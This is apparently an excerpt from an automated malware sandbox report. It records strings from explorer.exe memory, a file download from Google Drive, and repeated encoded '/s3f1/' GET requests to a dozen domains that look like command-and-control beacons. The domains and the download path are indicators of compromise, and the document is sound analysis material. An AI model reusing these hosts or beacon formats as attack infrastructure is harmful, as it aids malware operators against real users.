    Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/
    Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant
    Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin
    Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
    Source: unknown | DNS traffic detected: queries for: drive.google.com
    Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=16igyruBeyi1SLH2lfqbjS2ggty9bFGFC HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: drive.google.com | Cache-Control: no-cache
    Source: global traffic | HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/nqfdtgt678la5ha3g2tbhed40e9h4e57/1637762850000/13904828925096904893/*/16igyruBeyi1SLH2lfqbjS2ggty9bFGFC?e=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Cache-Control: no-cache | Host: doc-14-5s-docs.googleusercontent.com | Connection: Keep-Alive
    Source: global traffic | HTTP traffic detected: GET /s3f1/?0v=PTZX9bbDrHz+cSGvcymGk0mts24461Z1qQ1nyKxozOrcJ62jRcnhMEjPJVIjYEdLVzgY&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1 | Host: www.izivente.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
    Source: global traffic | HTTP traffic detected: GET /s3f1/?0v=djAV39Fd+2tTaJZ0vMg9wx3f2dAzn5uoNnRL0R1SzoIuCwqtHRucI/njP/LN+anlykG6&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1 | Host: www.musee-radix-hairsalon.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
    Source: global traffic | HTTP traffic detected: GET /s3f1/?0v=sqInqd/J1oF05xIRIYy6fIocxGbhQvf/UJ8WsTvvwcutrQRehAYuBiNZHMXnLC/ELIDP&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1 | Host: www.teslafreesuperchargermiles.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
    Source: global traffic | HTTP traffic detected: GET /s3f1/?0v=SHCw80AJpwYBr9Gcy19d9t3wNH3OULHDJ3WoL9xOYwR6hbrNjBBxIJP5Ay3SVk+aC6rM&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1 | Host: www.mvsteals.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
    Source: global traffic | HTTP traffic detected: GET /s3f1/?0v=mH/60k+8QaINko6jE2QpZl5PE74OV+HVH/ClSiWHQSmVZS7BQfRqR+Cg+8qmWPEHLuT3&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1 | Host: www.thaicharuen.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
    Source: global traffic | HTTP traffic detected: GET /s3f1/?0v=UFnETU8dieTu408infxPFcIZ9A51JABruIfjxtzTo70f1rUHWxHKXlzNhsAQN9Kxpi4c&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1 | Host: www.morningstarapparel.space | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
    Source: global traffic | HTTP traffic detected: GET /s3f1/?0v=09o28MjQy1cZQ5Pjj+CLcbQvMAiWJGV2Uxg7+ScaYTXEQUafs3S8SGgaduHkLU6DHZH5&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1 | Host: www.soarlikeaneagle.site | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
    Source: global traffic | HTTP traffic detected: GET /s3f1/?0v=mbzqDKJ3zGVZXRXzBR45Cgdnnesr2+nRJSwniRIMGUaPxNPQA+ji5LfWApDcm/CqO18J&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1 | Host: www.evaccines.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
    Source: global traffic | HTTP traffic detected: GET /s3f1/?0v=NBR0aPdzKjxBJ/qIBF///end99Hz3MSBKbZXqSBgBb5XrtkET9he0lXIERUBepCdWUFS&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1 | Host: www.celsb.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
    Source: global traffic | HTTP traffic detected: GET /s3f1/?0v=d8/OqiJyMkDaGTNTMgoxgiTtJv1BTsaVDDjuqFtpNub02Pcaaru29SvOabQgh8wWKZWy&hXeT=Wxlp HTTP/1.1 | Host: www.4mtechmachines.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
    Source: global traffic | HTTP traffic detected: GET /s3f1/?0v=F/pbsBegFO7o3fLKo/FzEC9ZwTRXzaIgUSgpsvNThmOurZQxU5rRi5MGW6g3EwPdsbP6&hXeT=Wxlp HTTP/1.1 | Host: www.hara.cloud | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
    Source: unknown | HTTPS traffic detected: 142.250.185.110:443 -> 192.168.11.20:49805 version: TLS 1.2